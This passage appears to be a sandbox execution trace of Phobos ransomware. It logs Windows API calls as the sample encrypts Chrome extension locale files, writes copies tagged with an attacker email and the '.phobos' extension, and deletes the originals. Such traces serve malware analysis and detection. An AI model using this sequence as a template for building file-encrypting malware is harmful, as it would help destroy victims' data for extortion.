HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json")) returned 0x2020 [0163.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.968] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.968] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0163.969] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.969] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4082, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4090, dwBufLen=0x4090 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4090) returned 1 [0164.032] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4090, lpOverlapped=0x0) returned 1 [0164.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0164.033] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.033] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.033] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.033] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.033] CloseHandle (hObject=0x138) returned 1 [0164.033] CloseHandle (hObject=0x194) returned 1 [0164.033] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json")) returned 1 [0164.034] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.035] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20601) returned 1 [0164.035] CloseHandle (hObject=0x194) returned 1 [0164.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json")) returned 0x2020 [0164.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.035] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.035] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.036] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.036] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5079, lpOverlapped=0x0) returned 1 [0164.219] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5080, dwBufLen=0x5080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5080) returned 1 [0164.220] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5080, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5080, lpOverlapped=0x0) returned 1 [0164.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0164.222] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.222] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.222] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.222] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.222] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.222] CloseHandle (hObject=0x194) returned 1 [0164.222] CloseHandle (hObject=0x138) returned 1 [0164.222] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json")) returned 1 [0164.223] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.224] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16140) returned 1 [0164.224] CloseHandle (hObject=0x138) returned 1 [0164.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json")) returned 0x2020 [0164.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.224] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.224] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.224] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.225] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3f0c, lpOverlapped=0x0) returned 1 [0164.226] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f10, dwBufLen=0x3f10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f10) returned 1 [0164.226] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3f10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3f10, lpOverlapped=0x0) returned 1 [0164.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0164.227] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.227] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.227] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.227] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.227] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.227] CloseHandle (hObject=0x138) returned 1 [0164.227] CloseHandle (hObject=0x194) returned 1 [0164.227] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json")) returned 1 [0164.228] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.229] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20596) returned 1 [0164.229] CloseHandle (hObject=0x194) returned 1 [0164.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json")) returned 0x2020 [0164.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.229] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.230] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.232] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.232] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5074, lpOverlapped=0x0) returned 1 [0164.242] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5080, dwBufLen=0x5080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5080) returned 1 [0164.243] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5080, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5080, lpOverlapped=0x0) returned 1 [0164.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0164.244] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.244] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.244] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.244] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.244] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.244] CloseHandle (hObject=0x194) returned 1 [0164.244] CloseHandle (hObject=0x138) returned 1 [0164.244] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json")) returned 1 [0164.245] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.246] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=21923) returned 1 [0164.246] CloseHandle (hObject=0x138) returned 1 [0164.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json")) returned 0x2020 [0164.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), 